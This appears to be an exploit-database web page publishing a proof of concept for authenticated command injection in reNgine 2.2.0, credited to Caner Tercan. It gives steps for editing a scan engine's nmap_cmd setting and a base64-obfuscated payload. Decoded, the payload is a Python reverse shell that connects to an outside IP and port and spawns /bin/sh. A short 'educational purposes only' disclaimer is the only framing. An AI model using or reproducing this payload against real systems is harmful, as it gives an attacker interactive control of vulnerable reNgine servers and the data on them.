Rengine 2.2.0 command injection (authenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-10-01 | Type : webapps | Platform : multiple
This exploit / vulnerability Rengine 2.2.0 command injection (authenticated) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)
# Date: 2024-09-29
# Exploit Author: Caner Tercan
# Vendor Homepage: https://rengine.wiki/
# Software Link: https://github.com/yogeshojha/rengine
# Version: v2.2.0
# Tested on: macOS

POC :

1. Login the Rengine Platform
2. Click the Scan Engine
3. Modify any Scan Engine
4. I modified nmap_cmd parameters on yml config
5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.

payload :

'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh #’

Rengine 2.2.0 command injection (authenticated)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Rengine 2.2.0 command injection (authenticated) Vulnerability / Exploit